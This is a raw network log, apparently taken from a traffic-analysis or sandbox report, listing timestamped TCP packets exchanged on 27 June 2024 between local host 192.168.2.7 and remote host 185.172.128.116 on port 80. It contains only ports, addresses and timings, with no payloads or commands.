Jun 27, 2024 05:58:51.698373079 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698384047 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698405027 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698421001 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698554993 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698564053 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698574066 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698584080 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698590040 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698612928 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698838949 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698848963 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698858023 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698868036 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698874950 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698899031 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.781687021 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781704903 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781716108 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781754971 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.781785965 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.781797886 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781840086 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781850100 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781861067 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.781871080 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.781897068 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.782156944 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.782167912 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.782176971 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.782186985 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.782200098 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.782205105 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.782218933 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.782232046 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789582014 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789623976 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789644957 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789655924 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789684057 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789700031 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789808989 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789819002 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789829969 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.789841890 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789860010 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.789968967 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790004015 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790096045 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790105104 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790113926 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790123940 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790132046 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790139914 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790157080 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790174961 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790414095 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790422916 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790431976 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790451050 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790473938 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790581942 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790591002 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790600061 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790618896 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790641069 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790764093 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790772915 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790783882 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790791988 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790802956 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790807962 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790818930 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790827036 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790836096 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.790863991 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.790888071 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791177988 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791188002 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791198015 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791210890 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791218996 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791244984 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791511059 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791520119 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791529894 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791538954 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791548967 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791555882 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791562080 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791570902 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791580915 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791588068 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791595936 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791605949 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.791614056 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.791632891 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792103052 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792113066 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792123079 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792131901 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792141914 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792149067 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792157888 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792167902 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792176008 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792185068 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792191029 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792200089 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792211056 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792221069 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792246103 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792782068 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792790890 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792799950 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792809963 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792819023 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792826891 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792834997 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792848110 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792851925 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792860985 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792866945 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792876959 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.792882919 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.792907953 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794485092 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794540882 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794559956 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794569016 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794595957 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794691086 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794701099 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794724941 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794775009 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794785023 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794794083 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794814110 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794828892 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.794970989 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794980049 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.794989109 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795007944 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795032024 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795039892 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795048952 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795058012 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795068979 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795083046 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795109987 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795413017 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795422077 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795432091 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795440912 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795450926 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795460939 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795465946 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795476913 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795491934 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795506954 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795712948 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795753002 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795770884 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795799971 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795864105 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795874119 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795883894 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.795895100 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.795913935 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796027899 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796036959 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796046972 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796056986 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796065092 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796072960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796078920 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796087980 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796103954 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796139002 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796283960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796293974 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796319008 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796354055 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796363115 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796372890 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796382904 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796390057 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796403885 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796430111 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796669960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796680927 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796706915 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796746969 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796756983 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.796782970 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.796803951 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869038105 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869055033 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869067907 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869091034 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869108915 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869131088 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869143009 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869153023 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869164944 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869173050 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869196892 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869359016 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869405985 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869455099 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869467974 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869478941 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869488955 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869497061 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869507074 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869513988 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869523048 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869533062 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.869539976 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869555950 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.869586945 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877161980 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877209902 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877232075 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877243996 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877275944 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877396107 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877405882 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877415895 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877428055 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877446890 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877459049 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877639055 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877648115 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877657890 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877667904 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877677917 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877685070 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877700090 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877711058 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877890110 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877901077 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877911091 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877922058 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877928972 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877938986 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.877957106 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.877978086 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878248930 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878259897 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878272057 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878282070 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878293037 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878299952 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878309011 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878321886 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878330946 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878340960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878348112 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878367901 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878654003 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878664017 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878674984 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878681898 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878691912 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878699064 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878712893 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878725052 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.878860950 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.878901005 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879053116 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879064083 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879074097 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879084110 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879091978 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879101038 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879111052 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879122019 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879132032 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879138947 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879148960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879154921 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879167080 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879172087 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879182100 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879194021 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879200935 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879213095 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879220009 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879229069 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879242897 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879265070 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.879960060 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879970074 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879980087 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879990101 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.879997015 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880007029 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880017042 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880023956 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880033016 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880042076 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880050898 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880059004 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880069017 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880076885 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880089045 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880095005 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880103111 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880110979 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880116940 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880125999 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880136013 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880143881 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880156040 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880162001 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880171061 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880178928 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880186081 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880208015 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880922079 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880934000 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880944014 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880954981 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880961895 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.880970955 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880981922 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880990982 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.880997896 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.881007910 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881015062 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.881023884 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.881031036 CEST	49732	80	192.168.2.7	185.172.128.116
